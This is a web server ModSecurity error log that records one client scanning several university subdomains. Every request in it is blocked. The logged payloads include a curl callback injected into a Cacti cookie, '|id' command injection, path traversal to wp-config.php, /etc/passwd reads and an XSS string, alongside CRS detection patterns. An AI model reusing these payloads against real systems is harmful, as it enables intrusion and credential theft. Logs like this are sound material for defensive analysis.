[Tue Aug 29 11:41:30.385059 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26g53itpnwbbyb1q.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAYf-T4AAAAD"]
[Tue Aug 29 11:41:30.390149 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gips4eahqijnrd.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAc0NhYAAAAM"]
[Tue Aug 29 11:41:30.543102 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAaZ9vAAAAAo"]
[Tue Aug 29 11:41:30.650004 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAQSWpkAAAA0"]
[Tue Aug 29 11:41:30.677515 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAUKhHsAAABC"]
[Tue Aug 29 11:41:30.698667 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAcbSIAAAAAv"]
[Tue Aug 29 11:41:30.699711 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAaZ9vMAAAAo"]
[Tue Aug 29 11:41:30.700740 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gfqq4budm3ckm3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAUKhHwAAABC"]
[Tue Aug 29 11:41:31.416762 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gkzfuajdxtfi71.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@8Co-f0AAAcqJO0AAAAG"]
[Tue Aug 29 11:41:31.559764 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@8Co-f0AAAcqJPQAAAAG"]
[Tue Aug 29 11:41:32.353567 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAcbSIoAAAAv"]
[Tue Aug 29 11:41:32.390469 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAbo-Z0AAAAi"]
[Tue Aug 29 11:41:32.404089 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAaZ9vYAAAAo"]
[Tue Aug 29 11:41:32.405115 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAc0Nh8AAAAM"]
[Tue Aug 29 11:41:32.423414 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAUKhIAAAABC"]
[Tue Aug 29 11:41:32.522190 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAcbSIwAAAAv"]
[Tue Aug 29 11:41:32.525062 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAaZ9vgAAAAo"]
[Tue Aug 29 11:41:32.526346 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAbo-Z8AAAAi"]
[Tue Aug 29 11:41:32.554841 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAcoNYsAAAAF"]
[Tue Aug 29 11:41:32.594820 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAUKhIQAAABC"]
[Tue Aug 29 11:41:33.387894 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-cCo-f0AAAc0NiYAAAAM"]
[Tue Aug 29 11:41:33.444969 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAUKhIkAAABC"]
[Tue Aug 29 11:41:33.450658 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAcqJPwAAAAG"]
[Tue Aug 29 11:41:33.451199 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAQSWqUAAAA0"]
[Tue Aug 29 11:41:33.463732 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAcoNY0AAAAF"]
[Tue Aug 29 11:41:33.474000 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-cCo-f0AAAcqJP0AAAAG"]
[Tue Aug 29 11:41:33.495643 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAcqJP4AAAAG"]
[Tue Aug 29 11:41:34.590305 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-sCo-f0AAAcqJQkAAAAG"]
